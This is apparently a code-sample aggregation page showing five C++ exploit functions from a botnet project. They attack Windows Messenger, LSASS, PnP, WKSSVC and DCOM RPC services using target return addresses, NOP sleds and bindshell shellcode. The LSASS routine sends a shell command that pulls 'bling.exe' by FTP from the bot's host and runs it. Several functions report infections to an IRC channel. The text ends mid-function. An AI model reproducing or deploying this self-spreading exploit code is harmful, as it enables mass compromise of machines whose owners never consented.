示例#1
0
BOOL MessengerService(EXINFO exinfo)
{
    int sockUDP,ver,packetsz;
    unsigned char packet[8192];
    struct sockaddr_in targetUDP;

    struct
    {
        char os[30];
        DWORD SEH;
        DWORD JMP;
    } targetOS[] =
        {
            {
                "Windows 2000 SP 3 (en)",
                0x77ee044c, // unhandledexceptionfilter pointer
                0x768d693e // cryptsvc.dll call [esi+48] 0x768d693e
            },
            {
                "Windows XP SP 1 (en)",
                0x77ed73b4,
                0x7804bf52 //rpcrt4.dll call [edi+6c]
            }
        };

    int TargetOS = FpHost(exinfo.ip, FP_RPC);
    if ((TargetOS == OS_WINNT) || (TargetOS == OS_UNKNOWN)) return FALSE;
    if (TargetOS == OS_WIN2K) ver = 0;
    if (TargetOS == OS_WINXP) ver = 1;
    ZeroMemory(&targetUDP, sizeof(targetUDP));

    targetUDP.sin_family = AF_INET;
    targetUDP.sin_addr.s_addr = finet_addr(exinfo.ip);
    targetUDP.sin_port = fhtons(exinfo.port);


    packetsz = PreparePacket((char*)packet,sizeof(packet),targetOS[ver].JMP,targetOS[ver].SEH);


    if ((sockUDP = fsocket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
    {
        return FALSE;
    }

    if (fsendto(sockUDP, (char*)packet, packetsz, 0, (struct sockaddr *)&targetUDP, sizeof(targetUDP)) == -1)
    {
        return FALSE;
    }
    fclosesocket(sockUDP);
	Sleep(500);
    if (ConnectShellEx(exinfo, 9191) == true) {
        exploit[exinfo.exploit].stats++;
        return TRUE;
    }
    return FALSE;
}
示例#2
0
文件: lsass2.cpp 项目: hazcod/botnets
BOOL lsass2(EXINFO exinfo)
{
	int i, targetx, len, targetxOS;

	char hostipc[40];
	char hostipc2[40*2];
	char buf[LEN+1];
	char sendbuf[(LEN+1)*2];
	char req4u[sizeof(reqx4)+20];
	char screq[BUFSIZE+sizeof(reqx7)+1500+440];
	char screq2k[4348+4060];
	char screq2k2[4348+4060];
	char recvbuf[1600];
	char strasm[]="\x66\x81\xEC\x1C\x07\xFF\xE4";
	char strBuffer[BUFSIZE];

	char buffer[IRCLINE], cmd_buff[400];

	char smblen;
	char unclen;

	unsigned short port;

	SOCKET sSocket, bSocket;
	SOCKADDR_IN ssin, bsin;

	targetxOS = FpHost(exinfo.ip, FP_RPC);
	if ((targetxOS == OS_UNKNOWN) || (targetxOS == OS_WINNT))
		return FALSE;

	if (targetxOS == OS_WINXP)
		targetx = 0;
	else if (rand() % 10)
		targetx = 1;
	else
		targetx = 2;

	_snprintf(hostipc, sizeof(hostipc),"\\\\%s\\ipc$", exinfo.ip);

	for (i=0; i<40; i++) {
		hostipc2[i*2] = hostipc[i];
		hostipc2[i*2+1] = 0;
	}

	memcpy(req4u, reqx4, sizeof(reqx4)-1);
	memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);
	memcpy(req4u+47+strlen(hostipc)*2, reqx4+87, 9);

	smblen = 52+(char)strlen(hostipc)*2;
	memcpy(req4u+3, &smblen, 1);

	unclen = 9 + (char)strlen(hostipc)*2;
	memcpy(req4u+45, &unclen, 1);

	port = fhtons(LSASS_BSPORT)^(USHORT)0x9999;
	memcpy(&bindshell[176], &port, 2);

	if ((targetx == 1) || (targetx == 2)) {
		memset(buf, NOP, LEN);

		//memcpy(&buf[2020], "\x3c\x12\x15\x75", 4);
		memcpy(&buf[2020], &ttargetx[targetx].jmpaddr, 4);
		memcpy(&buf[2036], &bindshell, strlen(bindshell));

		memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
		memcpy(&buf[2844], &ttargetx[targetx].jmpaddr, 4); // jmp ebx addr
		//memcpy(&buf[2844], "\x3c\x12\x15\x75", 4); // jmp ebx addr

		memcpy(&buf[2856], &bindshell, strlen(bindshell));

		for (i=0; i<LEN; i++) {
			sendbuf[i*2] = buf[i];
			sendbuf[i*2+1] = 0;
		}
		sendbuf[LEN*2]=0;
		sendbuf[LEN*2+1]=0;

		memset(screq2k, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);
		memset(screq2k2, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);

	} else {
		memset(strBuffer, NOP, BUFSIZE);
		memcpy(strBuffer+160, bindshell, strlen(bindshell));
		memcpy(strBuffer+1980, strasm, strlen(strasm));
		*(long *)&strBuffer[1964]=ttargetx[targetx].jmpaddr;
	}

	memset(screq, 0x31, BUFSIZE+sizeof(reqx7)+1500);

	if ((sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP)) == SOCKET_ERROR)
		return FALSE;

	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family = AF_INET;
	ssin.sin_port = fhtons((unsigned short)exinfo.port);
	ssin.sin_addr.s_addr = finet_addr(exinfo.ip);

	if (fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) {
		fclosesocket(sSocket);
		return FALSE;
	}

	if (fsend(sSocket, reqx1, sizeof(reqx1)-1, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	if (fsend(sSocket, reqx2, sizeof(reqx2)-1, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	if (fsend(sSocket, reqx3, sizeof(reqx3)-1, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	if (fsend(sSocket, req4u, smblen+4, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	if (fsend(sSocket, reqx5, sizeof(reqx5)-1, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	if (fsend(sSocket, reqx6, sizeof(reqx6)-1, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	if ((targetx == 1) || (targetx == 2)) {
		memcpy(screq2k, reqx8, sizeof(reqx8)-1);
		memcpy(screq2k+sizeof(reqx8)-1, sendbuf, (LEN+1)*2);

		memcpy(screq2k2, reqx9, sizeof(reqx9)-1);
		memcpy(screq2k2+sizeof(reqx9)-1, sendbuf+4348-sizeof(reqx8)+1, (LEN+1)*2-4348);

		memcpy(screq2k2+sizeof(reqx9)-1+(LEN+1)*2-4348-sizeof(reqx8)+1+206, shitx3, sizeof(shitx3)-1);

		if (fsend(sSocket, screq2k, 4348, 0) == SOCKET_ERROR) {
			fclosesocket(sSocket);
			return FALSE;
		}
		len = frecv(sSocket, recvbuf, 1600, 0);

		if (fsend(sSocket, screq2k2, 4060, 0) == SOCKET_ERROR) {
			fclosesocket(sSocket);
			return FALSE;
		}

	} else {
		memcpy(screq, reqx7, sizeof(reqx7)-1);
		memcpy(screq+sizeof(reqx7)-1, &strBuffer[0], BUFSIZE);
		memcpy(screq+sizeof(reqx7)-1+BUFSIZE, shitx1, 9*16);

		screq[BUFSIZE+sizeof(reqx7)-1+1500-304-1] = 0;
		if (fsend(sSocket, screq, BUFSIZE+sizeof(reqx7)-1+1500-304, 0) == SOCKET_ERROR) {
			fclosesocket(sSocket);
			return FALSE;
		}
	}

	len = frecv(sSocket, recvbuf, 1600, 0);

	if ((bSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}

	memset(&bsin, 0, sizeof(bsin));
	bsin.sin_family = AF_INET;
	bsin.sin_port = fhtons(LSASS_BSPORT);
	bsin.sin_addr.s_addr = finet_addr(exinfo.ip);

	if (fconnect(bSocket, (LPSOCKADDR)&bsin, sizeof(bsin)) == -1) {
		fclosesocket(sSocket);
		fclosesocket(bSocket);
		return FALSE;
	}

	if (frecv(bSocket, recvbuf, 1600, 0) > 0) {
		Sleep(500);

		_snprintf(cmd_buff, sizeof(cmd_buff),
	//		"tftp -i %s get %s&%s&exit\n", GetIP(exinfo.sock), filename, filename);
			"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
		GetIP(exinfo.sock),FTP_PORT);	
	
		if (fsend(bSocket, cmd_buff, strlen(cmd_buff), 0) == SOCKET_ERROR) {
			fclosesocket(sSocket);
			fclosesocket(bSocket);
			return FALSE;
		}

		fclosesocket(sSocket);
		fclosesocket(bSocket);

		_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
		if (!exinfo.silent)
			irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
		addlog(buffer);
		exploit[exinfo.exploit].stats++;

		return TRUE;
	} else
		return FALSE;
}
示例#3
0
BOOL PnP( char *target, void* conn, EXINFO exinfo, int OffNum )
{
	SOCKADDR_IN addr;
	int len;
	int sockfd;
	unsigned short smblen;
	char tmp[1024];
	unsigned char packet[4096];
	unsigned char *ptr;
	char recvbuf[4096];
	IRC* irc=(IRC*)conn;
	BOOL success=FALSE;
	char* thisTarget;
	int pnpbindsize=405;
	int TargetOS, Target;
	char* tOS="";

	WSADATA wsa;
	fWSAStartup(MAKEWORD(2,0), &wsa);

	if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE;

	thisTarget = exinfo.ip;
	TargetOS=FpHost(thisTarget,FP_NP);
	if (TargetOS==OS_UNKNOWN) 
		TargetOS=FpHost(thisTarget,FP_SMB);
	if (TargetOS == OS_WINNT){
		Target=OS_WINNT;
		success=FALSE;
	}else if (TargetOS==OS_WINXP){
		Target=OS_WINXP;
		success=FALSE;
	}else if (TargetOS==OS_WIN2K){
		Target=OS_WIN2K;
		success=TRUE;
	}else{
		success=FALSE;
	}

	ZeroMemory(&addr,sizeof(addr));
	addr.sin_family = AF_INET;
	addr.sin_addr.s_addr = finet_addr(thisTarget);
	addr.sin_port = fhtons((unsigned short)exinfo.port);

	if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) return FALSE;
	if (fsend(sockfd, (const char *)SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) return FALSE;

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
	
	if (fsend(sockfd, (const char *)SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) return FALSE;
	
	len = frecv(sockfd, recvbuf, 4096, 0);
	if (len <= 10) return FALSE;

	if (fsend(sockfd, (const char *)SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) return FALSE;
	
	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;

	ptr = packet;
	memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
	ptr += sizeof(SMB_TreeConnectAndX)-1;

	sprintf(tmp,"\\\\%s\\IPC$",thisTarget);
	convert_name((char *)ptr, tmp);
	smblen = strlen(tmp)*2;
	ptr += smblen;
	smblen += 9;
	memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);

	memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
	ptr += sizeof(SMB_TreeConnectAndX_)-1;

	smblen = ptr-packet;
	smblen -= 4;
	memcpy(packet+3, &smblen, 1);

	if (fsend(sockfd, (char *)packet, ptr-packet, 0) < 0) return FALSE;

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;

	if (fsend(sockfd, (char *)SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) return FALSE;

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;

	if (fsend(sockfd, (char *)SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) return FALSE;

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;

	// nop
	ptr = packet;
	memset(packet, '\x90', sizeof(packet));

	// Start prepare header -- dETOX mod --
	memcpy(RPC_call + 260, Offsets[OffNum], 4); 

	// header & offsets
	memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
	ptr += sizeof(RPC_call)-1;

	// shellcode
	unsigned short port;
    port = fhtons(bindport)^(USHORT)0x9999;
    memcpy(&bindshell[176],&port,2);
	memcpy(ptr,bindshell,pnpbindsize-1);

	// end of packet
	memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
		RPC_call_end,
		sizeof(RPC_call_end)-1);

	// sending...
	if (fsend(sockfd, (char *)packet, 2196, 0) < 0) return FALSE;
	frecv(sockfd, recvbuf, 4096, 0);

	if (!exinfo.silent && exinfo.verbose){
		switch(Target){
		case 1:
			tOS="WINNT";
			break;
		case 2:
			tOS="WIN2K";
			break;
		case 3:
			tOS="WINXP";
			break;
		default:
			tOS="UNKNOWN/2K3/LINUX";
			break;
		}

		irc->privmsg(target,"%s %s: Target OS is %s... (%s).", scan_title, exploit[exinfo.exploit].name, tOS, exinfo.ip);
	}


//	if(success){
		Sleep(2000);
		if (ConnectShell(exinfo,bindport))
		{
			if (!exinfo.silent)
				irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
			exploit[exinfo.exploit].stats++;
		}
		else
			if (!exinfo.silent && exinfo.verbose)
				irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
//	}
	return TRUE;
}
示例#4
0
文件: wkssvc.cpp 项目: hazcod/botnets
//BOOL ScriptGod_WKSSVC(unsigned long nTargetID,EXINFO exinfo,char *target, void* conn)
BOOL sgwkssvc(unsigned long nTargetID,EXINFO exinfo,char *target, void* conn)
{
	IRC* irc=(IRC*)conn;
	//irc->privmsg(target,"%s %s: Connected to IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
	
	BOOL success=FALSE;
	int TargetOS;
//	char szShellBuf[ 512 ];
	int iShellSize;

	// =============================
	char* pszTarget;
	// ---
	char szNetbiosTarget[ 8192 ];
	wchar_t wszNetbiosTarget[ 8192 ];
	unsigned char szShellcodeEncoded[ ( 405 * 2 ) + 1 ];
	unsigned char szExploitsData[ 3500 ];
	unsigned long nExploitsDataPos;
	wchar_t wszExploitsData[ sizeof( szExploitsData ) ];
	// ---
	char szIPC[ 8192 ];
	NETRESOURCE NetSource;
	// ---
	char szPipe[ 8192 ];
	HANDLE hPipe;
	// ---
	RPC_ReqBind BindPacket;
	unsigned long nBytesWritten;
	RPC_ReqNorm ReqNormalHeader;
	unsigned long nPacketSize;
	unsigned char* pPacket;
	unsigned long nPacketPos;
	// ============================

	TargetOS = FpHost(exinfo.ip, FP_PORT5K);
	if(TargetOS != OS_WINXP)
		TargetOS = FpHost(exinfo.ip, FP_RPC);

	if(TargetOS != OS_WINXP)
		return FALSE;
	else
		success=TRUE;
	
//	irc->privmsg(target,"%s %s: Target running XP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);

	// parameters
	pszTarget=exinfo.ip;

//	char URL[MAX_HOSTNAME];
//	char fname[_MAX_FNAME];
//	sprintf(fname,"eraseme_%d%d%d%d%d.exe",rand()%9,rand()%9,rand()%9,rand()%9,rand()%9);
//	_snprintf(URL,sizeof(URL),
//		"ftp://*****:*****@%s:%d/%s",
//		(PrivateIP(exinfo.ip)?inip:exip),FTP_PORT,fname);
	
	unsigned short port;
    port = fhtons(bindport)^(USHORT)0x9999;
    memcpy(&bindshell[176],&port,2);
    
	iShellSize=wbindsize;//setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), URL, false, NULL);
	if (!iShellSize)
		return FALSE;

	// get shellcode
	//iShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename );
	//if( !iShellSize )
	//	return FALSE;

	// generate exploits buffer
	// ========================
	ZeroMemory(szShellcodeEncoded, sizeof(szShellcodeEncoded));
	ZeroMemory(szExploitsData, sizeof(szExploitsData));
	ZeroMemory(wszExploitsData, sizeof(wszExploitsData));

	// fill with NOPs (using inc ecx instead of NOP, 0-terminated-string)
	memset(szExploitsData,'A',sizeof(szExploitsData)-1);

	// new EIP
	*(unsigned long*)(&szExploitsData[Targets[nTargetID].nNewEIP_BufferOffset]) = Targets[nTargetID].nNewEIP;

	// some NOPs
	nExploitsDataPos = 2300;

	// add stack
	memcpy( &szExploitsData[ nExploitsDataPos ], szStack, sizeof( szStack ) - 1 );
	nExploitsDataPos += sizeof( szStack ) - 1;

	// add decoder
	memcpy( &szExploitsData[ nExploitsDataPos ], szDecoder, sizeof( szDecoder ) - 1 );
	nExploitsDataPos += sizeof( szDecoder ) - 1;

	// add shellcode
	// - bind port
	// - encode
	Encode( (unsigned char*)bindshell, iShellSize, szShellcodeEncoded );
	// - add
	memcpy( &szExploitsData[ nExploitsDataPos ], szShellcodeEncoded, strlen( (char*)szShellcodeEncoded ) );
	nExploitsDataPos += strlen( (char*)szShellcodeEncoded );
	// - 0 terminaten for decoder
	szExploitsData[ nExploitsDataPos ] = 0;
	nExploitsDataPos += 1;

	// convert to UNICODE
	// ==================
	for( int n = 0; n < sizeof( szExploitsData ); n++ )
		wszExploitsData[ n ] = szExploitsData[ n ];
	//MultiByteToWideChar( CP_ACP, 0, (char*)szExploitsData, -1, wszExploitsData, sizeof( wszExploitsData ) / sizeof( wchar_t ) );
	_snprintf(szNetbiosTarget,sizeof(szNetbiosTarget), "\\\\%s", pszTarget);
	mbstowcs(wszNetbiosTarget,szNetbiosTarget, sizeof(wszNetbiosTarget)/sizeof(wchar_t));
	
	// create NULL session
	// ===================
	if( strcmpi( pszTarget, "." ) )
	{
		//_snprintf(szIPC,sizeof(szIPC), "\\\\%s\\", pszTarget);
		_snprintf(szIPC,sizeof(szIPC),"\\\\%s\\",pszTarget);
		strncat(szIPC,"ipc$",sizeof(szIPC));
		ZeroMemory(&NetSource,sizeof(NetSource));
		NetSource.lpRemoteName = szIPC;
		fWNetAddConnection2(&NetSource,"","",0);
	}
	// ===================

	// connect to pipe
	// ===============
	//_snprintf(szPipe,sizeof(szPipe),"\\\\%s\\pipe\\wkssvc",pszTarget);
	_snprintf(szPipe,sizeof(szPipe),"\\\\%s\\",pszTarget);
	strncat(szPipe,"pipe\\wkssvc",sizeof(szPipe));
	hPipe = CreateFile(szPipe, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
	if(hPipe == INVALID_HANDLE_VALUE)
	{
		fWNetCancelConnection2(NetSource.lpRemoteName, 0, FALSE);
		return FALSE;
	}
	// ===============

	// bind packet
	// ===========
	ZeroMemory(&BindPacket,sizeof(BindPacket));
	BindPacket.NormalHeader.versionmaj		= 5;
	BindPacket.NormalHeader.versionmin		= 0;
	BindPacket.NormalHeader.type			= 11;	// bind
	BindPacket.NormalHeader.flags			= 3;	// first + last fragment
	BindPacket.NormalHeader.representation	= 0x00000010; // little endian
	BindPacket.NormalHeader.fraglength		= sizeof(BindPacket);
	BindPacket.NormalHeader.authlength		= 0;
	BindPacket.NormalHeader.callid			= 1;
	BindPacket.maxtsize						= 4280;
	BindPacket.maxrsize						= 4280;
	BindPacket.assocgid						= 0;
	BindPacket.numelements					= 1;
	BindPacket.contextid					= 0;
	BindPacket.numsyntaxes					= 1;
	BindPacket.Interface1.version			= 1;
	memcpy(BindPacket.Interface1.byte, "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a", 16);
	BindPacket.Interface2.version			= 2;
	memcpy(BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16);

	// send
	if(!WriteFile(hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL))
	{
		//irc->privmsg(target,"%s %s: !WriteFile: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
		CloseHandle(hPipe);
		fWNetCancelConnection2(NetSource.lpRemoteName, 0, FALSE);
		return FALSE;
	}
	// ===========

	// request
	// =======
	// generate packet
	// ---------------

	// calc packet size
	nPacketSize = 0;
	nPacketSize += sizeof( szWKSSVCUnknown1 ) - 1;
	nPacketSize += sizeof( UNISTR2 );
	nPacketSize += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
	while(nPacketSize % 4)
		nPacketSize++;
	if(Targets[nTargetID].bCanUse_NetAddAlternateComputerName)
		nPacketSize += sizeof( szWKSSVCUnknown2 ) - 1;
	nPacketSize += sizeof( UNISTR2 ); 
	nPacketSize += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
	while( nPacketSize % 4 )
		nPacketSize++;
	nPacketSize += 8; // szWSSKVCUnknown3
	if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
		nPacketSize += 4; // NetAddAlternateComputerName = reserved
	else
		nPacketSize += 2; // NetValidateName = NameType

	// alloc packet
	pPacket = (unsigned char*)malloc( nPacketSize );
	if( !pPacket )
	{
		//irc->privmsg(target,"%s %s: !malloc: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
		CloseHandle( hPipe );
		fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
		return FALSE;
	}
	ZeroMemory(pPacket,nPacketSize);

	// build packet
	nPacketPos = 0;

	// - szWKSSVCUnknown1
	memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown1, sizeof( szWKSSVCUnknown1 ) - 1 );
	nPacketPos += sizeof( szWKSSVCUnknown1 ) - 1;

	// - wszNetbiosTarget
	( (UNISTR2*)&pPacket[ nPacketPos ] )->length	= wcslen( wszNetbiosTarget ) + 1;
	( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown	= 0;
	( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength	= ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
	nPacketPos += sizeof( UNISTR2 );

	wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszNetbiosTarget );
	nPacketPos += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );

	// - align
	while( nPacketPos % 4 )
		nPacketPos++;

	// - szWKSSVCUnknown2
	if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
	{
		memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown2, sizeof( szWKSSVCUnknown2 ) - 1 );
		nPacketPos += sizeof( szWKSSVCUnknown2 ) - 1;
	}

	// - wszExploitsData
	( (UNISTR2*)&pPacket[ nPacketPos ] )->length	= wcslen( wszExploitsData ) + 1;
	( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown	= 0;
	( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength	= ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
	nPacketPos += sizeof( UNISTR2 );

	wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszExploitsData );
	nPacketPos += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );

	// - align
	while( nPacketPos % 4 )
		nPacketPos++;

	// - szWSSKVCUnknown3 (only eigth 0x00s)
	ZeroMemory(&pPacket[nPacketPos],8);
	nPacketPos += 8;

	if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
	{
		// NetAddAlternateComputerName = 0
		*(DWORD*)&pPacket[ nPacketPos ] = 0;
		nPacketPos += sizeof( DWORD );
	}
	else
	{
		// NetValidateName = NetSetupMachine
		*(unsigned short*)&pPacket[ nPacketPos ] = 1;
		nPacketPos += 2;
	}

	// header
	ZeroMemory(&ReqNormalHeader,sizeof(ReqNormalHeader));
	ReqNormalHeader.NormalHeader.versionmaj		= 5;
	ReqNormalHeader.NormalHeader.versionmin		= 0;
	ReqNormalHeader.NormalHeader.type			= 0;	// request
	ReqNormalHeader.NormalHeader.flags			= 3;	// first + last fragment
	ReqNormalHeader.NormalHeader.representation	= 0x00000010; // little endian
	ReqNormalHeader.NormalHeader.authlength		= 0;
	ReqNormalHeader.NormalHeader.callid			= 1;
	ReqNormalHeader.prescontext					= 0;
	if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
		ReqNormalHeader.opnum					= 27;	// NetrAddAlternateComputerName
	else
		ReqNormalHeader.opnum					= 25;	// NetrValidateName2
	// send
	if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nPacketSize, 4280, true ) )
	{
		//irc->privmsg(target,"%s %s: !SendReqPacket_Part: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
		CloseHandle( hPipe );
		free( pPacket );
		fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
		return FALSE;
	}
	// =======
	
	// clean up
	// =================;
	CloseHandle( hPipe );
	free( pPacket );
	fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );

	if (success)
	{
		Sleep(5000);
		if (ConnectShell(exinfo,bindport))
		{
			if (!exinfo.silent)
				irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
			exploit[exinfo.exploit].stats++;
		}
		else
			if (!exinfo.silent && exinfo.verbose)
				irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
	}
	return TRUE;
}
示例#5
0
BOOL dcom(EXINFO exinfo)
{
	char sendbuf[IRCLINE];

	if (exinfo.port == 445) {
		NETRESOURCEW nr;

		if (!ConnectViaNullSession(exinfo.ip, &nr)) 
			return FALSE;
		else {
			char szPipePath[MAX_PATH];
			sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", exinfo.ip);
			HANDLE hFile = CreateFile(szPipePath, GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

			if (hFile == INVALID_HANDLE_VALUE) {
				CloseNullSession(exinfo.ip);
				return FALSE;
			}

			// sprintf(sendbuf, "[dcom]: Connected to pipe \\\\%s\\pipe\\epmapper", exinfo.ip);
			// irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);

			int TargetOS = FpHost(exinfo.ip, FP_PORT5K);

			// get shellcode
			DWORD reqbufsize;
			char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, TRUE);
			if (!reqbuf) {
				CloseHandle(hFile);
				CloseNullSession(exinfo.ip);
				return FALSE;
			}

			unsigned long lWritten;
			char *szInBuf = (char *)malloc(100000);
			memset(szInBuf, 0, 100000);

			// send the bind string
			DWORD dwRead;
			TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL);
			if (szInBuf[2] != 0x0C) {
				free(szInBuf); 
				free(reqbuf);
				CloseHandle(hFile);
				CloseNullSession(exinfo.ip);
				return FALSE;
			}

			// send the evil request
			if (!WriteFile(hFile, reqbuf, reqbufsize, &lWritten, 0)) {
				free(szInBuf); 
				free(reqbuf);
				CloseHandle(hFile);
				CloseNullSession(exinfo.ip);
				return FALSE;
			}

			BOOL Result = ReadFile(hFile, szInBuf, 10000, &dwRead, NULL);

			free(reqbuf); 
			free(szInBuf);
			CloseHandle(hFile);
			CloseNullSession(exinfo.ip);

			if (Result == TRUE) {
				return FALSE;
			}
		}

	} else { // port 135 and others

		int TargetOS = FpHost(exinfo.ip, FP_RPC);
		if (TargetOS == OS_WINNT) 
			return FALSE;

		// get a funky fresh socket
		SOCKET sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP);
		if (sSocket == SOCKET_ERROR) 
			return FALSE;

		// fill in sockaddr and resolve the host
		SOCKADDR_IN ssin; 
		memset(&ssin, 0, sizeof(ssin));
		ssin.sin_family = AF_INET;
		ssin.sin_port = fhtons((unsigned short)exinfo.port);
		ssin.sin_addr.s_addr = finet_addr(exinfo.ip);

		// get shellcode
		DWORD reqbufsize;
		char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, FALSE);
		if (!reqbuf) {
			fclosesocket(sSocket);
			return FALSE;
		}

		// connect to the server
		int iErr = fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin));
		if (iErr == -1) { // connect failed, exit
			free(reqbuf);
			fclosesocket(sSocket);
			return FALSE;
		}

		// send the bind string
		if (fsend(sSocket, bindstr, sizeof(bindstr)-1, 0) == SOCKET_ERROR) {
			free(reqbuf);
			fclosesocket(sSocket);
			return FALSE;
		}

		// read reply
		char recvbuf[4096];
		frecv(sSocket, recvbuf, 4096, 0);
		// Send the evil request
		if (fsend(sSocket, reqbuf, reqbufsize, 0) == SOCKET_ERROR) {
			free(reqbuf);
			fclosesocket(sSocket);
			return FALSE;
		}

		// read reply
		if (frecv(sSocket, recvbuf, 4096, 0) == SOCKET_ERROR) {
			free(reqbuf);
			fclosesocket(sSocket);
			return FALSE;
		}

		free(reqbuf);
		// Close the socket
		fclosesocket(sSocket);		
	}

	sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip);
	for (int i=0; i < 6; i++) {
		if (searchlog(sendbuf)) {
			sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
			if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
			addlog(sendbuf);
			exploit[exinfo.exploit].stats++;

			break;
		}
		Sleep(5000);
	}

